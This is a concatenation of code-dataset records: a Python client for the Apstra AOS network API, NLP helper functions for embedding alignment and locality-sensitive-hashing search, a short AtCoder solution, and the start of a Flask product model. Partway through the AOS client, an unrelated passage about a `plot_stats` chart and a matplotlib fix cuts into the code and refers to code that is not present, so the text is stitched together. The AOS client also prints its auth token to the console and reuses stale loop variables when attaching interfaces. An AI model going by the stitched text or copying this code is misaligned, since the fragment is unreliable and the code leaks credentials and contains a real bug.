urllib3.response.HTTPHeaderDict({\"Content-Type\": \"application/json\", \"AuthToken\": self.token})\n\n def http_get(self, path, expected=None) -> urllib3.response.HTTPResponse:\n print(f\"==== GET {path}\")\n resp = self.http.request('GET', path, headers=self.json_token_header)\n if expected:\n print(f\"== status (expect {expected}): {resp.status}\")\n if resp.status != expected:\n print(f\"== body: {resp.data}\")\n else:\n print(f\"== status: {resp.status}\")\n return resp\n\n def http_delete(self, path, expected=None) -> urllib3.response.HTTPResponse:\n print(f\"==== DELETE {path}\")\n resp = self.http.request('DELETE', path, headers=self.json_token_header)\n if expected:\n print(f\"== status (expect {expected}): {resp.status}\")\n if resp.status != expected:\n print(f\"== body: {resp.data}\")\n else:\n print(f\"== status: {resp.status}\")\n return resp\n \n\n def http_post(self, path, data, headers=None, expected=None) -> urllib3.response.HTTPResponse:\n if not headers:\n headers = self.json_token_header\n print(f\"==== POST {path}\\n{data}\")\n resp = self.http.request('POST', path, body=json.dumps(data), headers=headers)\n if expected:\n print(f\"== status (expect {expected}): {resp.status}\")\n if resp.status != expected:\n print(f\"== body: {resp.data}\")\n else:\n print(f\"== status: {resp.status}\")\n return resp\n\n def http_put(self, path, data, headers=None, expected=None) -> urllib3.response.HTTPResponse:\n print(f\"==== PUT {path}\\n{data}\")\n if not headers:\n headers = self.json_token_header\n resp = self.http.request('PUT', path, body=json.dumps(data), headers=headers)\n if expected:\n print(f\"== status (expect {expected}): {resp.status}\")\n if resp.status != expected:\n print(f\"== body: {resp.data}\")\n else:\n print(f\"== status: {resp.status}\")\n return resp\n\n def http_patch(self, path, data, headers=None, expected=None) -> urllib3.response.HTTPResponse:\n print(f\"==== PATCH {path}\\n{data}\")\n if not headers:\n headers = self.json_token_header\n resp = self.http.request('PATCH', path, body=json.dumps(data), headers=headers)\n if expected:\n 
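In the first chart of `plot_stats` above, the query yields rows of (avg_net_worth, sport_name), but the code appends `i[0]` to `sports` and `i[1]` to `networth`; the double swap makes `plt.bar(networth, sports)` plot correctly while the variable names and the printed `Sports\tNet_worth` header stay inverted. A hedged cleanup with the columns named for what they actually hold:

```python
import matplotlib.pyplot as plt


def plot_avg_net_worth(rows):
    # rows: iterable of (avg_net_worth, sport_name), as the query returns
    net_worth = [row[0] for row in rows]
    sports = [row[1] for row in rows]
    plt.bar(sports, net_worth)
    plt.xlabel("Name of Sports")
    plt.ylabel("Avg net worth of the players in millions")
    plt.title("Average athlete net worth, Sports-wise")
    plt.show()
```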
print(f\"== status (expect {expected}): {resp.status}\")\n if resp.status != expected:\n print(f\"== body: {resp.data}\")\n else:\n print(f\"== status: {resp.status}\")\n return resp\n\n def graph_query(self, bp_id, query) -> urllib3.response.HTTPResponse:\n query_url = f\"/api/blueprints/{bp_id}/qe?type=operation\"\n resp = self.http_post(query_url, query, expected=200)\n return resp\n\n\n def _auth(self) -> None:\n auth_url = \"/api/aaa/login\"\n auth_spec = {\n \"username\": self.username,\n \"password\": self.password\n }\n resp = self.http_post( auth_url, auth_spec, headers=self.json_header, expected=201)\n self.token = json.loads(resp.data)[\"token\"]\n print(f\"== token: {self.token}\")\n \n\n\n\n def create_IP_Pool(self, pools) -> None:\n ip_pools_url = \"/api/resources/ip-pools\"\n for pool in pools:\n print( pool )\n ip_pools_spec = {\n \"subnets\": [{\"network\": network} for network in pool[\"subnets\"]], \n \"tags\": pool[\"tags\"],\n \"display_name\": pool[\"name\"],\n \"id\": pool[\"name\"],\n }\n resp = self.http_post(ip_pools_url, ip_pools_spec, expected=202)\n \n def routing_zone_get(self, bp_id, rz_name) -> str:\n routing_zone_url = f\"/api/blueprints/{bp_id}/security-zones\"\n resp = self.http_get(routing_zone_url)\n rzs = json.loads(resp.data)[\"items\"] \n for rz in rzs:\n print(f\"label: {rzs[rz]['label']}, rz_name: {rz_name}\")\n if rzs[rz][\"label\"] == rz_name:\n rz_id = rzs[rz][\"id\"]\n print(f\"routing_zone_id: {rz_id}\")\n return rz_id\n\n def routing_zone_add(self, bp_id, data) -> None:\n routing_zone_url = f\"/api/blueprints/{bp_id}/security-zones\"\n routing_zone_spec = {\n \"sz_type\": \"evpn\",\n \"label\": data[\"label\"],\n \"vrf_name\": f\"{data['label']}-vrf\",\n \"vlan_id\": data[\"vlan_id\"]\n }\n resp = self.http_post(routing_zone_url, routing_zone_spec, expected=201)\n\n # TODO: monitor job\n time.sleep(5)\n \n routing_zone_id = self.routing_zone_get(bp_id, data[\"label\"])\n dhcp_server_url = f\"/api/blueprints/{bp_id}/security-zones/{routing_zone_id}/dhcp-servers\"\n dhcp_server_spec = { \"items\": data[\"dhcp_servers\"] }\n resp = self.http_put(dhcp_server_url, dhcp_server_spec, expected=204)\n\n # \"Private-10_0_0_0-8\"\n loopback_url = f\"/api/blueprints/{bp_id}/resource_groups/ip/\" + requests.utils.quote(f\"sz:{routing_zone_id},leaf_loopback_ips\")\n loopback_spec = {\n \"pool_ids\": [ prefix.replace(\"/\", \"-\").replace(\".\", \"_\") for prefix in data[\"leaf_loopback_ips\"] ]\n }\n resp = self.http_put(loopback_url, loopback_spec, expected=202)\n\n def routing_zone_delete(self, bp_id, routing_zone_name) -> None:\n routing_zone_id = self.routing_zone_get(bp_id, routing_zone_name)\n routing_zone_url = f\"/api/blueprints/{bp_id}/security-zones/{routing_zone_id}\"\n self.http_delete(routing_zone_url, expected=204)\n\n\n def context_template_delete(self, bp_id, ct_id) -> None:\n resp = self.http_delete(f\"/api/blueprints/{bp_id}/endpoint-policies/{ct_id}?delete_recursive=true\", expected=204)\n\n def virtual_networks_find(self, bp_id, vn_name) -> str:\n vn_find_url = f\"/api/blueprints/{bp_id}/virtual-networks\"\n resp = self.http_get(vn_find_url, expected=200)\n if resp.status == 200:\n vns = json.loads(resp.data)[\"virtual_networks\"]\n for vn in vns:\n if vns[vn][\"label\"] == vn_name:\n return vns[vn][\"id\"]\n else:\n print(resp.data)\n return \"Error\"\n\n # not ready\n def virtual_networks_batch(self, bp_id, networks):\n vn_batch_url = f\"/api/blueprints/{bp_id}/virtual-networks-batch?async=full\"\n vn_batch_spec = {\n 
\"virtual-networks\": networks\n }\n resp = self.http_post(vn_batch_url, vn_batch_spec, expected=202)\n if resp.status != 202: #accepted\n print(f\"vn_batch_spec: {resp.data}\")\n\n\n def virtual_networks_add(self, bp_id, networks, routing_zone_label, systems):\n policy_attach_url = f\"/api/blueprints/{bp_id}/obj-policy-batch-apply?async=full\"\n\n # build dict from systems to be used for policy\n vns_from_systems = {} # { VN: [{system: label, if_name: name}] }\n for system in systems:\n system_label = system[\"label\"]\n if \"interfaces\" not in system:\n continue\n for interface in system[\"interfaces\"]:\n if_name = interface[\"if_name\"]\n if \"vns\" not in interface:\n continue\n for vn in interface[\"vns\"]:\n if vn not in vns_from_systems:\n vns_from_systems[vn] = []\n vns_from_systems[vn].append({ \"system\": system_label, \"if_name\": if_name})\n print(f\"== vn_from_systems: {vns_from_systems}\")\n\n # build dict system_id from nodes \n nodes_url = f\"/api/blueprints/{bp_id}/nodes\"\n nodes = json.loads(self.http_get(nodes_url, expected=200).data)['nodes']\n system_ids = {} # system_label: system_id\n for k, v in nodes.items():\n if v[\"type\"] == \"system\":\n system_ids[v[\"label\"]] = v[\"id\"]\n\n routing_zone_id = self.routing_zone_get(bp_id, routing_zone_label)\n vn_batch_url = f\"/api/blueprints/{bp_id}/virtual-networks\"\n policy_import_url = f\"/api/blueprints/{bp_id}/obj-policy-import\"\n for vn in networks:\n # update networks with system_id and create VN\n vn[\"security_zone_id\"] = routing_zone_id\n for i in range(len(vn[\"bound_to\"])):\n vn[\"bound_to\"][i][\"system_id\"] = system_ids[vn[\"bound_to\"][i][\"system_label\"]]\n # print(system)\n new_vn = self.http_post(vn_batch_url, vn, expected=201)\n vn_node_id = json.loads(new_vn.data)[\"id\"]\n\n # create connectivity template for the VN created\n policy_name = f\"{routing_zone_label}_{vn['vn_type']}_{vn['vlan_id']}_vlan_tagged\"\n vn_ep_name = f\"vn_endpoints_{policy_name}\"\n vn_policy = {\n \"policies\": [\n {\n \"id\": vn_ep_name,\n \"label\": vn_ep_name,\n \"description\": f\"vlan {vn['label']} vxlan vlan tagged\",\n \"policy_type_name\": \"batch\",\n \"attributes\": {\n \"subpolicies\": [\n f\"pipeline_{policy_name}\"\n ]\n },\n \"user_data\": \"{\\\"isSausage\\\": true}\",\n \"visible\": True,\n \"tags\": [],\n },\n {\n \"id\": f\"pipeline_{policy_name}\",\n \"label\": \"Virtual Network (Single) (pipeline)\",\n \"description\": \"Add a single VLAN to interfaces, as tagged or untagged.\",\n \"policy_type_name\": \"pipeline\",\n \"attributes\": {\n \"first_subpolicy\": policy_name,\n \"second_subpolicy\": f\"noop_{policy_name}\"\n },\n \"visible\": False,\n \"tags\": [] \n },\n {\n \"id\": policy_name,\n \"label\": \"Virtual Network (Single)\",\n \"description\": \"\",\n \"policy_type_name\": \"AttachSingleVLAN\",\n \"attributes\": {\n \"vn_node_id\": vn_node_id,\n \"tag_type\": \"vlan_tagged\"\n },\n \"visible\": False,\n \"tags\": [],\n },\n {\n \"id\": f\"noop_{policy_name}\",\n \"label\": \"noop\",\n \"description\": \"\",\n \"policy_type_name\": \"noop\",\n \"attributes\": {},\n \"visible\": False,\n \"tags\": [],\n }\n ]\n }\n ep_result = self.http_put(policy_import_url, vn_policy, expected=204)\n # print(f\"== ep result is empty: {json.loads(ep_result.data)}\")\n\n # associate the connectivity template to the interfaces\n if vn['label'] not in vns_from_systems or interface not in vns_from_systems[vn['label']]:\n continue\n for interface in vns_from_systems[vn['label']]:\n # get interface id from graph 
db\n interface_query = {\n \"blueprint-id\": bp_id,\n \"query\": f\"node('system', label='{system_label}').out('hosted_interfaces').node('interface',if_name='{if_name}',name='interface')\"\n }\n interface_data = json.loads(self.graph_query(bp_id, interface_query).data)\n if_id = interface_data['items'][0]['interface']['id']\n print( f\"== if_id: {if_id}\")\n\n policy_attach_list = {\n \"application_points\": [\n {\n \"id\": if_id,\n \"policies\": [{\"policy\": vn_ep_name,\"used\": True}]\n } \n ]\n }\n self.http_patch(policy_attach_url, policy_attach_list, expected=202)\n\n def virtual_networks_delete(self, bp_id, vn_name ) -> urllib3.response.HTTPResponse:\n vn_id = self.virtual_networks_find(bp_id, vn_name)\n vn_url = f\"/api/blueprints/{bp_id}/virtual-networks/{vn_id}?async=full\"\n return self.http_delete(vn_url, expected=202)\n\n\n def commit(self, bp_id, description='') -> urllib3.response.HTTPResponse:\n # get revision id\n revision_url = f\"/api/blueprints/{bp_id}/revisions\"\n revision_data = json.loads(self.http_get(revision_url,expected=200).data)\n revision_id = int(revision_data[\"items\"][-1][\"revision_id\"]) + 10\n\n # TODO: fix. currently needs GUI to commit\n commit_url = f\"/api/blueprints/{bp_id}/deploy?async=full\"\n commit_data = {\n \"version\": revision_id,\n \"description\": description\n }\n resp = self.http_put(commit_url, commit_data, expected=202)\n return resp\n\n\n\ndef main():\n with open(r'inventory-python.yaml') as file:\n AOS_ENV = yaml.load(file, Loader=yaml.FullLoader)\n\n bp_id = AOS_ENV[\"blueprints\"][0][\"id\"]\n\n aos_server = AosServer(AOS_ENV[\"aos_server\"][\"host\"], AOS_ENV[\"aos_server\"][\"port\"], AOS_ENV[\"aos_server\"][\"username\"], AOS_ENV[\"aos_server\"][\"password\"])\n\n # deprecated\n if len(sys.argv) >1 and sys.argv[1] == \"delete\":\n pass\n # print( \"deleting\")\n # aos_server.virtual_networks_delete(bp_id, \"c-801\")\n # aos_server.routing_zone_delete(bp_id, \"lab2\")\n # # aos_server.context_template_delete(bp_id, \"test1234\")\n\n else:\n print( \"creating\")\n # aos_server.create_IP_Pool(AOS_ENV[\"resources\"][\"ip_pools\"])\n aos_server.routing_zone_add(bp_id, AOS_ENV[\"blueprints\"][0][\"routing_zones\"][0])\n aos_server.virtual_networks_add(bp_id, AOS_ENV[\"blueprints\"][0][\"routing_zones\"][0][\"virtual_networks\"], AOS_ENV[\"blueprints\"][0][\"routing_zones\"][0][\"label\"], AOS_ENV[\"blueprints\"][0][\"systems\"])\n # TODO: implement async\n # time.sleep(10)\n aos_server.commit(bp_id)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n\n","repo_name":"kimcharli/apstra-api","sub_path":"python/aos_python.py","file_name":"aos_python.py","file_ext":"py","file_size_in_byte":15183,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"19970383232","text":"# -*- coding: utf-8 -*-\nimport re\nimport string\n\nimport numpy as np\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom nltk.tokenize import TweetTokenizer\n\n\ndef process_tweet(tweet):\n '''\n Input:\n tweet: a string containing a tweet\n Output:\n tweets_clean: a list of words containing the processed tweet\n\n '''\n stemmer = PorterStemmer()\n stopwords_english = stopwords.words('english')\n # remove stock market tickers like $GE\n tweet = re.sub(r'\\$\\w*', '', tweet)\n # remove old style retweet text \"RT\"\n tweet = re.sub(r'^RT[\\s]+', '', tweet)\n # remove hyperlinks\n tweet = re.sub(r'https?:\\/\\/.*[\\r\\n]*', '', tweet)\n # remove hashtags\n # only 
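Inside `virtual_networks_add` in aos_python.py above, the attach step reads `interface`, `system_label`, and `if_name` from variables that leaked out of the earlier scan loops, so the guard and the graph query can target a stale endpoint. A hedged rewrite of that inner loop, assuming the `{vn_label: [{'system': ..., 'if_name': ...}]}` layout that `vns_from_systems` is built with earlier in the method:

```python
# Sketch of the per-VN attach loop; every value comes from the endpoint
# dict instead of variables left over from earlier loops.
for endpoint in vns_from_systems.get(vn['label'], []):
    system_label = endpoint['system']
    if_name = endpoint['if_name']
    interface_query = {
        "blueprint-id": bp_id,
        "query": f"node('system', label='{system_label}')"
                 ".out('hosted_interfaces')"
                 f".node('interface', if_name='{if_name}', name='interface')",
    }
    interface_data = json.loads(self.graph_query(bp_id, interface_query).data)
    if_id = interface_data['items'][0]['interface']['id']
    policy_attach_list = {
        "application_points": [
            {"id": if_id, "policies": [{"policy": vn_ep_name, "used": True}]},
        ]
    }
    self.http_patch(policy_attach_url, policy_attach_list, expected=202)
```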
removing the hash # sign from the word\n tweet = re.sub(r'#', '', tweet)\n # tokenize tweets\n tokenizer = TweetTokenizer(preserve_case=False, strip_handles=True,\n reduce_len=True)\n tweet_tokens = tokenizer.tokenize(tweet)\n\n tweets_clean = []\n for word in tweet_tokens:\n if (word not in stopwords_english and # remove stopwords\n word not in string.punctuation): # remove punctuation\n # tweets_clean.append(word)\n stem_word = stemmer.stem(word) # stemming word\n tweets_clean.append(stem_word)\n\n return tweets_clean\n\n\ndef get_dict(file_name):\n \"\"\"\n This function returns the english to french dictionary given a file where the each column corresponds to a word.\n Check out the files this function takes in your workspace.\n \"\"\"\n my_file = pd.read_csv(file_name, delimiter=' ')\n etof = {} # the english to french dictionary to be returned\n for i in range(len(my_file)):\n # indexing into the rows.\n en = my_file.loc[i][0]\n fr = my_file.loc[i][1]\n etof[en] = fr\n\n return etof\n\n\ndef cosine_similarity(A, B):\n '''\n Input:\n A: a numpy array which corresponds to a word vector\n B: A numpy array which corresponds to a word vector\n Output:\n cos: numerical number representing the cosine similarity between A and B.\n '''\n # you have to set this variable to the true label.\n cos = -10 \n dot = np.dot(A, B)\n normb = np.linalg.norm(B)\n \n if len(A.shape) == 1: # If A is just a vector, we get the norm\n norma = np.linalg.norm(A)\n cos = dot / (norma * normb)\n else: # If A is a matrix, then compute the norms of the word vectors of the matrix (norm of each row)\n norma = np.linalg.norm(A, axis=1)\n epsilon = 1.0e-9 # to avoid division by 0\n cos = dot / (norma * normb + epsilon)\n \n return cos\n\n\ndef get_matrices(en_fr, french_vecs, english_vecs):\n \"\"\"convert dictionary of words to matrix of embeddings\n Input:\n en_fr: English to French dictionary\n french_vecs: French words to their corresponding word embeddings.\n english_vecs: English words to their corresponding word embeddings.\n Output: \n X: a matrix where the columns are the English embeddings.\n Y: a matrix where the columns correspong to the French embeddings.\n R: the projection matrix that minimizes the F norm ||X R -Y||^2.\n \"\"\"\n\n # X_l and Y_l are lists of the english and french word embeddings\n X_l = list()\n Y_l = list()\n\n # get the english words (the keys in the dictionary) and store in a set()\n english_set = set(english_vecs.keys())\n\n # get the french words (keys in the dictionary) and store in a set()\n french_set = set(french_vecs.keys())\n\n # store the french words that are part of the english-french dictionary (these are the values of the dictionary)\n french_words = set(en_fr.values())\n\n # loop through all english, french word pairs in the english french dictionary\n for en_word, fr_word in en_fr.items():\n\n # check that the french word has an embedding and that the english word has an embedding\n if fr_word in french_set and en_word in english_set:\n\n # get the english embedding\n en_vec = english_vecs[en_word]\n\n # get the french embedding\n fr_vec = french_vecs[fr_word]\n\n # add the english embedding to the list\n X_l.append(en_vec)\n\n # add the french embedding to the list\n Y_l.append(fr_vec)\n\n # stack the vectors of X_l into a matrix X\n X = np.array(X_l)\n\n # stack the vectors of Y_l into a matrix Y\n Y = np.array(Y_l)\n\n return X, Y\n\n\ndef compute_loss(X, Y, R):\n ''' computes frobenius on (XR - Y)\n Inputs: \n X: a matrix of dimension (m,n) where the columns are the 
English embeddings.\n Y: a matrix of dimension (m,n) where the columns correspong to the French embeddings.\n R: a matrix of dimension (n,n) - transformation matrix from English to French vector space embeddings.\n Outputs:\n L: a matrix of dimension (m,n) - the value of the loss function for given X, Y and R.\n '''\n # m is the number of rows in X\n m = X.shape[0]\n \n # diff is XR - Y \n diff = X @ R - Y\n\n # diff_squared is the element-wise square of the difference \n diff_squared = diff ** 2\n\n # sum_diff_squared is the sum of the squared elements\n sum_diff_squared = np.sum(diff_squared)\n\n # loss i is the sum_diff_squard divided by the number of examples (m)\n loss = sum_diff_squared/m\n ### END CODE HERE ###\n return loss\n\ndef compute_gradient(X, Y, R):\n ''' computes gradient for the loss X(XR-Y)*2/m\n Inputs: \n X: a matrix of dimension (m,n) where the columns are the English embeddings.\n Y: a matrix of dimension (m,n) where the columns correspong to the French embeddings.\n R: a matrix of dimension (n,n) - transformation matrix from English to French vector space embeddings.\n Outputs:\n g: a scalar value - gradient of the loss function L for given X, Y and R.\n '''\n # m is the number of rows in X\n m = X.shape[0]\n\n # gradient is X^T(XR - Y) * 2/m \n gradient = X.T @ (X@R - Y) * 2/m\n \n return gradient\n\ndef align_embeddings(X, Y, train_steps=100, learning_rate=0.0003, verbose=True, compute_loss=compute_loss, compute_gradient=compute_gradient):\n '''finetunes R vector\n Inputs:\n X: a matrix of dimension (m,n) where the columns are the English embeddings.\n Y: a matrix of dimension (m,n) where the columns correspong to the French embeddings.\n train_steps: positive int - describes how many steps will gradient descent algorithm do.\n learning_rate: positive float - describes how big steps will gradient descent algorithm do.\n Outputs:\n R: a matrix of dimension (n,n) - the projection matrix that minimizes the F norm ||X R -Y||^2\n '''\n np.random.seed(129)\n\n # the number of columns in X is the number of dimensions for a word vector (e.g. 
300)\n # R is a square matrix with length equal to the number of dimensions in th word embedding\n R = np.random.rand(X.shape[1], X.shape[1])\n\n for i in range(train_steps):\n if verbose and i % 25 == 0:\n print(f\"loss at iteration {i} is: {compute_loss(X, Y, R):.4f}\")\n # use the function that you defined to compute the gradient\n gradient = compute_gradient(X, Y, R)\n\n # update R by subtracting the learning rate times gradient\n R -= learning_rate * gradient\n return R\n\n\ndef nearest_neighbor(v, candidates, k=1, cosine_similarity=cosine_similarity):\n \"\"\"\n Input:\n - v, the vector you are going find the nearest neighbor for\n - candidates: a set of vectors where we will find the neighbors\n - k: top k nearest neighbors to find\n Output:\n - k_idx: the indices of the top k closest vectors in sorted form\n \"\"\"\n similarity_l = []\n\n # for each candidate vector...\n for row in candidates:\n # get the cosine similarity\n cos_similarity = cosine_similarity(v, row)\n\n # append the similarity to the list\n similarity_l.append(cos_similarity)\n\n # sort the similarity list and get the indices of the sorted list \n sorted_ids = np.argsort(similarity_l) \n \n # Reverse the order of the sorted_ids array\n sorted_ids = sorted_ids[::-1]\n \n # get the indices of the k most similar candidate vectors\n k_idx = sorted_ids[:k]\n return k_idx\n\n\ndef test_vocabulary(X, Y, R, nearest_neighbor=nearest_neighbor):\n '''\n Input:\n X: a matrix where the columns are the English embeddings.\n Y: a matrix where the columns correspong to the French embeddings.\n R: the transform matrix which translates word embeddings from\n English to French word vector space.\n Output:\n accuracy: for the English to French capitals\n '''\n\n # The prediction is X times R\n pred = X @ R\n\n # initialize the number correct to zero\n num_correct = 0\n\n # loop through each row in pred (each transformed embedding)\n for i in range(len(pred)):\n # get the index of the nearest neighbor of pred at row 'i'; also pass in the candidates in Y\n pred_idx = nearest_neighbor(pred[i], Y, k=1)\n\n # if the index of the nearest neighbor equals the row of i... 
\\\n if pred_idx == i:\n # increment the number correct by 1.\n num_correct += 1\n\n # accuracy is the number correct divided by the number of rows in 'pred' (also number of rows in X)\n accuracy = num_correct/pred.shape[0]\n\n return accuracy\n\ndef get_document_embedding(tweet, en_embeddings, process_tweet=process_tweet):\n '''sum embeddings of all words in a given tweet\n Input:\n - tweet: a string\n - en_embeddings: a dictionary of word embeddings\n Output:\n - doc_embedding: sum of all word embeddings in the tweet\n '''\n doc_embedding = np.zeros(300)\n\n # process the document into a list of words (process the tweet)\n processed_doc = process_tweet(tweet)\n for word in processed_doc:\n # add the word embedding to the running total for the document embedding\n if word in en_embeddings.keys():\n doc_embedding += en_embeddings[word]\n return doc_embedding\n\ndef get_document_vecs(all_docs, en_embeddings, get_document_embedding=get_document_embedding):\n '''\n Input:\n - all_docs: list of strings - all tweets in our dataset.\n - en_embeddings: dictionary with words as the keys and their embeddings as the values.\n Output:\n - document_vec_matrix: matrix of tweet embeddings.\n - ind2Doc_dict: dictionary with indices of tweets in vecs as keys and their embeddings as the values.\n '''\n\n # the dictionary's key is an index (integer) that identifies a specific tweet\n # the value is the document embedding for that document\n ind2Doc_dict = {}\n\n # this is list that will store the document vectors\n document_vec_l = []\n\n for i, doc in enumerate(all_docs):\n\n # get the document embedding of the tweet\n doc_embedding = get_document_embedding(doc, en_embeddings)\n\n # save the document embedding into the ind2Tweet dictionary at index i\n ind2Doc_dict[i] = doc_embedding\n\n # append the document embedding to the list of document vectors\n document_vec_l.append(doc_embedding)\n\n # convert the list of document vectors into a 2D array (each row is a document vector)\n document_vec_matrix = np.vstack(document_vec_l)\n\n return document_vec_matrix, ind2Doc_dict\n\ndef hash_value_of_vector(v, planes):\n \"\"\"Create a hash for a vector; hash_id says which random hash to use.\n Input:\n - v: vector of tweet. It's dimension is (1, N_DIMS)\n - planes: matrix of dimension (N_DIMS, N_PLANES) - the set of planes that divide up the region\n Output:\n - res: a number which is used as a hash for your vector\n\n \"\"\"\n # for the set of planes,\n # calculate the dot product between the vector and the matrix containing the planes\n # remember that planes has shape (300, 10)\n # The dot product will have the shape (1,10) \n dot_product = v @ planes\n \n # get the sign of the dot product (1,10) shaped vector\n sign_of_dot_product = np.sign(dot_product)\n\n # set h to be false (eqivalent to 0 when used in operations) if the sign is negative,\n # and true (equivalent to 1) if the sign is positive (1,10) shaped vector\n # if the sign is 0, i.e. 
the vector is in the plane, consider the sign to be positive\n h = sign_of_dot_product >= 0\n\n # remove extra un-used dimensions (convert this from a 2D to a 1D array)\n h = np.squeeze(h)\n\n # initialize the hash value to 0\n hash_value = 0\n\n n_planes = planes.shape[1]\n for i in range(n_planes):\n # increment the hash value by 2^i * h_i \n hash_value += 2 ** i * h[i]\n \n # cast hash_value as an integer\n hash_value = int(hash_value)\n\n return hash_value\n\ndef make_hash_table(vecs, planes, hash_value_of_vector=hash_value_of_vector):\n \"\"\"\n Input:\n - vecs: list of vectors to be hashed.\n - planes: the matrix of planes in a single \"universe\", with shape (embedding dimensions, number of planes).\n Output:\n - hash_table: dictionary - keys are hashes, values are lists of vectors (hash buckets)\n - id_table: dictionary - keys are hashes, values are list of vectors id's\n (it's used to know which tweet corresponds to the hashed vector)\n \"\"\"\n\n # number of planes is the number of columns in the planes matrix\n num_of_planes = planes.shape[1]\n\n # number of buckets is 2^(number of planes) \n num_buckets = 2 ** num_of_planes\n\n # create the hash table as a dictionary.\n # Keys are integers (0,1,2.. number of buckets)\n # Values are empty lists\n hash_table = {i:[] for i in range(num_buckets)}\n\n # create the id table as a dictionary.\n # Keys are integers (0,1,2... number of buckets)\n # Values are empty lists\n id_table = {i:[] for i in range(num_buckets)}\n\n # for each vector in 'vecs'\n for i, v in enumerate(vecs):\n # calculate the hash value for the vector\n h = hash_value_of_vector(v, planes)\n\n # store the vector into hash_table at key h,\n # by appending the vector v to the list at key h\n hash_table[h].append(v)\n\n # store the vector's index 'i' (each document is given a unique integer 0,1,2...)\n # the key is the h, and the 'i' is appended to the list at key h\n id_table[h].append(i)\n\n\n return hash_table, id_table\n\n\ndef create_hash_id_tables(n_universes, planes_l, document_vecs):\n ''' Creating the hashtables'''\n hash_tables = []\n id_tables = []\n for universe_id in range(n_universes): # there are 25 hashes\n print('working on hash universe #:', universe_id)\n planes = planes_l[universe_id]\n hash_table, id_table = make_hash_table(document_vecs, planes)\n hash_tables.append(hash_table)\n id_tables.append(id_table)\n \n return hash_tables, id_tables\n\n\n\ndef approximate_knn(doc_id, v, planes_l, hash_tables, id_tables, k=1, num_universes_to_use=25, hash_value_of_vector=hash_value_of_vector):\n \"\"\"Search for k-NN using hashes.\"\"\"\n #assert num_universes_to_use <= N_UNIVERSES\n\n # Vectors that will be checked as possible nearest neighbor\n vecs_to_consider_l = list()\n\n # list of document IDs\n ids_to_consider_l = list()\n\n # create a set for ids to consider, for faster checking if a document ID already exists in the set\n ids_to_consider_set = set()\n\n # loop through the universes of planes\n for universe_id in range(num_universes_to_use):\n\n # get the set of planes from the planes_l list, for this particular universe_id\n planes = planes_l[universe_id]\n\n # get the hash value of the vector for this set of planes\n hash_value = hash_value_of_vector(v, planes)\n\n # get the hash table for this particular universe_id\n hash_table = hash_tables[universe_id]\n\n # get the list of document vectors for this hash table, where the key is the hash_value\n document_vectors_l = hash_table[hash_value]\n\n # get the id_table for this particular universe_id\n 
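# note: each universe is an independent set of random planes; pooling candidate buckets from several universes makes it more likely that the true nearest neighbor is among the vectors checked\n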
id_table = id_tables[universe_id]\n\n # get the subset of documents to consider as nearest neighbors from this id_table dictionary\n new_ids_to_consider = id_table[hash_value]\n\n\n # loop through the subset of document vectors to consider\n for i, new_id in enumerate(new_ids_to_consider):\n\n if doc_id == new_id:\n continue\n\n # if the document ID is not yet in the set ids_to_consider...\n if new_id not in ids_to_consider_set:\n # access document_vectors_l list at index i to get the embedding\n # then append it to the list of vectors to consider as possible nearest neighbors\n document_vector_at_i = document_vectors_l[i]\n vecs_to_consider_l.append(document_vector_at_i)\n\n # append the new_id (the index for the document) to the list of ids to consider\n ids_to_consider_l.append(new_id)\n\n # also add the new_id to the set of ids to consider\n # (use this to check if new_id is not already in the IDs to consider)\n ids_to_consider_set.add(new_id)\n\n\n # Now run k-NN on the smaller set of vecs-to-consider.\n print(\"Fast considering %d vecs\" % len(vecs_to_consider_l))\n\n # convert the vecs to consider set to a list, then to a numpy array\n vecs_to_consider_arr = np.array(vecs_to_consider_l)\n\n # call nearest neighbors on the reduced list of candidate vectors\n nearest_neighbor_idx_l = nearest_neighbor(v, vecs_to_consider_arr, k=k)\n\n # Use the nearest neighbor index list as indices into the ids to consider\n # create a list of nearest neighbors by the document ids\n nearest_neighbor_ids = [ids_to_consider_l[idx]\n for idx in nearest_neighbor_idx_l]\n\n return nearest_neighbor_ids","repo_name":"mz-zarei/nlp_specialization","sub_path":"1_Classification_VectorSpaces/doc_search_LSH_KNN/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":18056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40264391519","text":"#!/usr/bin/env python3\n\nn = int(input())\nA = list(map(int, input().split()))\nans = 10**10\nfor i in range(1<<(n-1)):\n anstemp = 0\n temp = A[0]\n for shift in range(n-1):\n if i >> shift & 1 == 1: # insert a split here\n anstemp = temp if anstemp == 0 else anstemp^temp\n temp = A[shift+1]\n else: # do not insert a split\n temp = temp | A[shift+1]\n anstemp = anstemp^temp\n ans = min(ans, anstemp)\nprint(ans)","repo_name":"skyeanka/atcoder","sub_path":"abc197/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73538892902","text":"from datetime import datetime\nfrom pytz import timezone\nimport MySQLdb\n\nfrom app import db\n\nclass Product(db.Model):\n \"\"\"product model definition\"\"\"\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50), unique=True)\n qtty = db.Column(db.Integer, default=0)\n reorder_level = db.Column(db.Integer, default=5)\n orders = db.relationship('Order', backref='product', lazy=True)\n reorders = db.relationship('ReOrder', backref='product', lazy=True)\n created_at = db.Column(db.DateTime, default=datetime.now(tz=timezone('Africa/Nairobi')))\n updated_at = db.Column(db.DateTime, default=datetime.now(tz=timezone('Africa/Nairobi')))\n\n\n @property\n def serializer(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'qtty': self.qtty,\n 'reorder_level': self.reorder_level,\n 'orders': [\n order.serializer\n for order in self.orders\n ],\n 'reorders': [\n reorder.serializer\n for reorder in self.reorders\n ],\n 'created_at': self.created_at,\n 'updated_at': self.updated_at,\n }\n\n\n def add(self, data):\n \"\"\"add
